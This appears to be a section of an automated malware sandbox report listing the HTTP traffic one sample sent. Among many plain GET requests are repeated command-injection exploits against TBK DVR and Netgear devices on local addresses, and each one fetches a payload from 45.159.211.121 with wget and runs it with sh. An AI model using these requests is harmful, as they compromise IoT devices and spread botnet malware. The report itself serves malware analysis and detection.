Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.53Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.75Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.75Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.75Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.75Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.75Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.75Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.91Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.83Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.83Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.83Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.83Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.83Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 157.230.19.197Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 104.21.84.89Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.96.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.96.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.96.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.96.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.135.83.132Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.135.83.132Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.135.83.132Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.135.83.132Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.135.83.132Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.135.83.132Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.135.83.132Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.91Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.91Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.91Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.91Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.91Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.120Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.120Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.120Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.120Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.120Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.120Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.156Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.156Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.156Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.156Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.156Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.156Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 104.21.49.253Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.191Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.191Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.191Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.191Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.191Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.191Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.96.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 90.156.201.102Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 90.156.201.102Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 90.156.201.123Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 172.67.198.22Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 90.156.201.54Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 90.156.201.102Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 90.156.201.102Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 90.156.201.123Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 90.156.201.54Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 90.156.201.123Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 90.156.201.54Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 90.156.201.29Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.12.92.157Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.200.28.226Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.26.122.75Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.26.122.75Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.26.122.75Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.74Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.74Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.74Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.208Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 89.253.219.24Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 136.243.14.123Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 178.159.33.243Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 178.159.33.243Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 178.159.33.243Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 172.67.167.8Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 104.21.57.213Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 172.67.167.8Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 104.21.57.213Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 172.67.167.8Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 104.21.57.213Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 172.67.167.8Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.96.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.96.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.96.9Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.96.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.188.104.7Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.188.104.7Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.188.104.7Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.188.104.7Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.188.104.7Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.188.104.7Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.188.104.7Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.188.104.7Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.188.104.7Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.188.104.7Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.188.104.7Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.188.104.7Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.188.104.7Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.188.104.7Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.188.104.7Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
